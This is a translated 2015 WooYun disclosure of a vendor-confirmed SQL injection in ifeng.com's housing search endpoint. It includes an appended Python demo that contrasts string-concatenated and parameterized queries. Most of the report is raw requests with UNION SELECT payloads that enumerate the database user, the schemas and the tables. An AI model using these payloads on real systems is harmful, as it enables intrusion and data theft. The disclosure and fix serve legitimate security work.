
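Vulnerability summary

Bug ID: wooyun-2015-0149202

Title: Over a hundred ifeng.com (凤凰网) sites share the same SQL injection vulnerability

Vendor: 凤凰网 (ifeng.com)

Author: 路人甲

Submitted: 2015-10-26 15:35

Fixed: 2015-12-10 15:46

Disclosed: 2015-12-10 15:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]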



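Vulnerability details

Disclosure status:

2015-10-26: Details reported to the vendor; awaiting vendor handling
2015-10-26: Vendor confirmed; details disclosed to the vendor only
2015-11-05: Details disclosed to core white hats and experts in related fields
2015-11-15: Details disclosed to regular white hats
2015-11-25: Details disclosed to trainee white hats
2015-12-10: Details disclosed to the public

Brief description:

Detailed description:

The subdomains of house.ifeng.com are all injectable, and SQL queries can be run directly.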

GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,user(),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://hn.house.ifeng.com/column
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Host: hn.house.ifeng.com
Cookie: ifh_site=17649%2Chn; city_redirected=13
HTTP/1.1 200 OK
Server: ifengweb/1.2.8
Date: Sat, 24 Oct 2015 09:38:52 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 141
jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\[email protected]","theurl":null}])
GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,(select+count(*)FROM+information_schema.schemata),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\uff1a5","theurl":null}])
GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,(select+distinct+group_concat(0x7e,schema_name,0x7e)+FROM+information_schema.schemata),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://hn.house.ifeng.com/column
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Host: hn.house.ifeng.com
Cookie: ifh_site=17649%2Chn; city_redirected=13
jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\uff1a~information_schema~,~app_house~,~estate_house~,~test~","theurl":null}])

GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,(SELECT+group_concat(table_name)+FROM+information_schema.tables+WHERE+table_schema='app_house'),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://hn.house.ifeng.com/column
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Host: gz.house.ifeng.com
Cookie: ifh_site=17649%2Chn; city_redirected=13
HTTP/1.1 200 OK
Server: ifengweb/1.2.8
Date: Sat, 24 Oct 2015 10:59:55 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 458
jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f
\uff1aacl_func,acl_group,acl_group_func,acl_module,acl_page,acl_permission,acl_role,acl_role_permission,acl_user_role,cache,city_phone,fyh_activity,fyh_game_egg,fyh_game
_egg_prize,fyh_game_egg_prizedetail,fyh_game_egg_user,fyh_log,fyh_phone,fyh_pic,fyh_special,fyh_user,fyh_user_activity,house_acl_user,house_menu,lp_apply,lp_area,lp_area
_vw,lp_ci","theurl":null}])


By an incomplete count, the following sites have this vulnerability:

Proof of vulnerability:

Remediation:

Copyright notice: when reposting, credit the source 路人甲@乌云
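
An added example, not part of the original report and not ifeng.com's code: the `prefix` injection shown in the requests above, reproduced against a constructed in-memory SQLite table, with a string-concatenated query beside a parameterized one. The table, column and function names are assumptions; the four-column shape follows the NULL,NULL,x,NULL payloads in the report, and sqlite_version() stands in for the MySQL user() probe.

```python
import sqlite3

def make_db():
    # Constructed sample data; the real schema is not shown in the report.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE listing (id INTEGER, city INTEGER, name TEXT, url TEXT)")
    db.executemany("INSERT INTO listing VALUES (?, ?, ?, ?)", [
        (1, 17649, "中铁·子悦台", "/hn/1"),
        (2, 17649, "中铁·逸都", "/hn/2"),
        (3, 13, "中铁·国际城", "/gz/3"),
    ])
    return db

def guide_vulnerable(db, city, prefix):
    # "Before": prefix is pasted into the SQL text, so a single quote closes
    # the string literal and everything after it is parsed as SQL.
    sql = ("SELECT id, city, name, url FROM listing "
           "WHERE city = %d AND name LIKE '%s%%'" % (int(city), prefix))
    return [row[2] for row in db.execute(sql)]

def guide_hardened(db, city, prefix):
    # "After": both values are bound parameters and never reach the parser.
    # LIKE wildcards typed by the user are escaped so they match literally.
    esc = prefix.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = ("SELECT id, city, name, url FROM listing "
           "WHERE city = ? AND name LIKE ? ESCAPE '\\'")
    return [row[2] for row in db.execute(sql, (int(city), esc + "%"))]

# Constructed probe with the same shape as the first request in the report.
PROBE = "中铁·子悦台' UNION ALL SELECT NULL,NULL,sqlite_version(),NULL-- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", guide_vulnerable(db, 17649, PROBE))
    print("hardened:  ", guide_hardened(db, 17649, PROBE))
    print("normal use:", guide_hardened(db, 17649, "中铁"))
```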


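Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-26 15:45

Vendor reply:

Thank you very much for your help with ifeng.com's information security. However, this is a single application, wildcard-resolved across a group of services; it is not "over a hundred websites".

Latest status:

None yet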